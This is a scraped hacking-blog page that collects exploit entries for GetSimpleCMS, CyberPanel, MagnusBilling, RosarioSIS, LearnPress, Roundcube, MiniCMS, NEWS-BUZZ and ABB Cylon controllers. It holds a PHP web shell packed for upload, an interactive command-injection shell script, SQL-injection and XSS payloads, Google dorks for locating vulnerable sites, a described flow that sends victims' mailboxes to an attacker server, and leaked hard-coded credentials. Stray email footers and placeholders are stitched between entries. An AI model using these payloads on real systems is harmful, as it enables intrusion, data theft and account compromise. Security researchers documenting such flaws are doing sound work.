# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976
PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
// Initialize a new Phar object, name it "archive.phar"
$phar = new Phar('archive.phar');
// Set the stub (entry point) for the Phar file, pointing to index.php
$phar->startBuffering();
$phar->addFromString('index.php', file_get_contents('index.php'));
$phar->setStub($phar->createDefaultStub('index.php'));
$phar->stopBuffering();
echo "Phar archive created successfully!";
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php.
After running the script, you should find a file named archive.phar in your working directory.
2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php.
2. You can find the file at http://getsimplecms/data/uploads/.
3)Details:
"Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
"Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
"Request URL": "http://getsimplecms/admin/upload.php",
"Request Method": "POST",
"Request Parameters": {
"file": "<Malicious File>"
},
PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 <?php system($_GET['cmd']); ?>
2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).
[Replace Your Domain Name]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863106544
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
#!/usr/bin/python3
import argparse
import httpx
import sys
RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"
print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()
allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]
parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()
if args.endpoint not in allowed_endpoints:
print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
parser.print_help()
sys.exit(1)
target = args.target
endpoint = args.endpoint
client = httpx.Client(base_url=target, verify=False)
try:
response = client.get("/")
response.raise_for_status()
except httpx.RequestError:
print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
sys.exit(1)
def get_token():
response = client.get("/")
return response.cookies.get("csrftoken")
def rce(client, csrf_token, cmd, endpoint):
headers = {
"X-CSRFToken": csrf_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile": "; %s; #"}' % cmd
response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
return response.json().get("requestStatus")
csrf_token = get_token()
if not csrf_token:
print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
sys.exit(1)
while True:
cmd = input(f"{YELLOW}$> {RESET}")
print(rce(client, csrf_token, cmd, endpoint))
# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/magnussolution/magnusbilling7
# Software Link: https://github.com/magnussolution/magnusbilling7
# Version: 7.3.0
# Tested on: Centos
# CVE : CVE-2023-30258
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Result: This PoC attempts to inject the id command.
[Replace Your Domain Name]
# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567
PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest
constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array )
votes['; CREATE TABLE aaa(t text) --]=1
# Exploit Title: LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection
# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7"
# Date: [Current Date, e.g., October 30, 2024]
# Exploit Author: [Your Name or Username]
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: <= 4.2.7
# Tested on: WordPress 6.x, Ubuntu 22.04
CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit)
Overview
CVE: CVE-2024-8522
Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7)
Type: SQL Injection
Impact: High
Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API
Description
The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation.
Affected Code Path
The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability:
plaintext
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
Proof of Concept (PoC)
The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay:
http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host:
targetwebsite.com
User-Agent: curl/7.81.0
Accept: */*
Exploitation Script
The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay.
python
import requests
import time
# Target URL for the API endpoint
url = '
http://targetwebsite.com/wp-json/learnpress/v1/courses
'
# SQL injection payloads
payloads = [
"IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection
"IF(1=1, SLEEP(10), 0)", # Basic true condition
"IF(1=2, SLEEP(10), 0)", # Basic false condition
]
# Iterate over payloads and measure response time
for payload in payloads:
params = {'c_only_fields': payload}
start_time = time.time() # Record start time
try:
# Send request to the vulnerable endpoint
response = requests.get(url, params=params)
# Calculate response time
response_time = time.time() - start_time
# Display result
print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds")
# Check for delay indicative of a successful SQL injection
if response_time > 10:
print("Potential SQL Injection vulnerability detected (delay observed).")
else:
print("No delay observed; injection may be unsuccessful.")
except requests.exceptions.RequestException as e:
print(f"Error during request: {e}")
Google Dorks for Identifying Vulnerable Sites
To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin:
inurl:"/wp-content/plugins/learnpress/"
inurl:"/wp-json/learnpress/v1/"
"powered by LearnPress" AND "version 4.2.7"
inurl:"/wp-content/plugins/learnpress/assets/js/"
"LearnPress" AND "WordPress LMS Plugin"
Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites.
Impact Analysis
If exploited, this SQL Injection vulnerability can have severe impacts, including:
Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information.
Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access.
Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website.
Recommendations
Immediate Update: Update the LearnPress plugin to a patched version when available.
Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts.
Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts.
Conclusion
The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures.
This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522.
Este mensaje, incluyendo sus anexos, puede contener información clasificada como
confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo.
Si usted no es el destinatario, le rogamos lo comunique al remitente y
proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no
autorizado está prohibido legalmente.
This message including any attachments may contain confidential information,
within the framework of the corporate Security Management System.
If you are not the intended recipient, please notify the sender and
delete this message without forwarding or retaining a copy, since any
unauthorized use is strictly prohibited by law.
Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home).
# Exploit Title: Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
# Google Dork:
# Exploit Author: AmirZargham
# Vendor Homepage: Roundcube - Free and Open Source Webmail Software
# Software Link: Releases · roundcube/roundcubemail
# Version: Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6.
# Tested on: firefox,chrome
# CVE: CVE-2024-37383
# CWE: CWE-79
# Platform: MULTIPLE
# Type: WebApps
Description:
The CVE-2024-37383 vulnerability was discovered in the Roundcube Webmail email client. This is a stored XSS vulnerability that allows an attacker to execute JavaScript code on the user's page. To exploit the vulnerability, all attackers need to do is open a malicious email using a Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6.
Usage Info:1 - open the Roundcube_mail_server_exploit_for_CVE-2024-37383.txt and export js file.2 - Change the web address of the original email (target) and the URL of the receiving server (attacker server).3 - You can put the code in file SVG <animate> tag and send it to the server. (can use this https://github.com/bartfroklage/CVE-2024-37383-POC)4 - After the victim clicks, all emails in the mailbox will be sent to your collaborator server.
This code automates the process of retrieving all messages inbox from a Roundcube webmail server and forwarding that data to a specific collaborator server endpoint.Here’s a step-by-step breakdown:
-
Setup URLs:
- The main webmail URL (target) and the receiving server URL (attackerserver) are defined as variables at the beginning for easy configuration.
-
Get Total Page Count:
- The getPageCount function sends a GET request to the main webmail URL to fetch metadata, including the total number of pages (pagecount).
- If pagecount is found, it proceeds to loop through each page.
-
Fetch Message IDs from All Pages:
- For each page from 1 to pagecount, it constructs a paginated URL to request that page.
- Each page’s response is checked for instances of add_message_row(NUMBER) using regex, extracting message IDs from each instance and collecting all IDs in a single list.
-
Retrieve Each Message's Content:
- For each message ID, the code constructs a URL to request detailed data about that message.
- It sends a GET request for each message ID URL, receiving the full response HTML.
-
Extract and Clean Message Data:
- Within each message response, it uses regex to capture the <title> (message title) and main message content.
- Any HTML tags are stripped from the message content to keep only the plain text.
-
Send the Data to the Server:
- For each extracted message, a POST request is made to the server endpoint with the title and cleaned message content, URL-encoded for proper transmission.
# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# Tested on: Ubuntu Windows
# CVE : CVE-2018-1000638
PoC:
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>
"Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>"
[Replace Your Domain Name]
# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability
# CVE : CVE-2024-10758
## Vulnerability Description:
There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Vulnerable code section:
In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:
<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>
In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code.
## Proof of Concept (PoC):
1.Location: http://localhost/NEWS-BUZZ/index.php
2.Time-Based SQL Injection Payload: ' OR sleep(10)#
3.PoC request:
POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=
4.PoC response:
The response will come called time by using sleep() function.
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a weak password policy, allowing
users to set overly simplistic or blank passwords and usernames without restrictions.
This vulnerability significantly reduces account security, enabling attackers
to exploit weak credentials for unauthorized access to the system.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5898
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5898.php
CVE ID: CVE-2024-48845
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48845
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="admin2" />
<input type="hidden" name="PASSWORD" value="7" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Setirkaj." />
</form>
</body>
</html>
ABB Cylon Aspect 3.08.03 Hard-coded Secrets
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller contains multiple instances
of hard-coded credentials, including usernames, passwords, and encryption
keys embedded in various java classes. This practice poses significant security
risks, allowing attackers to gain unauthorized access and compromise the
system's integrity.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5896
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5896.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat secrets.txt
- SynchronizedSecurityServicesHandler.class -> CrET8MEbraME4ahu
- MapInvisibleSchedule.class -> calendar:user
- WDSupervisor.class -> aamservletuser:kakideco
- AESCipher2.class -> uajo4nzibb$#1E4V5262b17f-c3d5-4190-a442-6d251f9da52b
- AESCipher.class -> default
- BrokerURL.class -> aamuser:default
- Schedule.class -> calendar:user
- BfUtils.class -> CrET8MEbraME4ahu
- Context.class -> \037jchabucos:friske
- Db.class -> matrixac1:aam
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an authenticated reflected
cross-site scripting vulnerability. Input passed to the GET parameters 'name'
and 'id' is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML/JS code in a user's browser session
in context of an affected site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5897
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5897.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
http://192.168.73.31:7226/servlets/MapServices?cmd=<script>alert(document.cookie)</script>&id=251
http://192.168.73.31:7226/servlets/MapServices?cmd=readScheduleConfig&id=<script>confirm(document.cookie)</script>
ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The application suffers from cleartext transmission and storage of
sensitive information in a Cookie. This includes the globals parameter, where
authdata contains base64-encoded credentials. A remote attacker can intercept
the HTTP Cookie, including authentication credentials, through a man-in-the-middle
attack, potentially compromising user accounts and sensitive data.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5895
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5895.php
CVE ID: CVE-2024-51546
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-51546
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
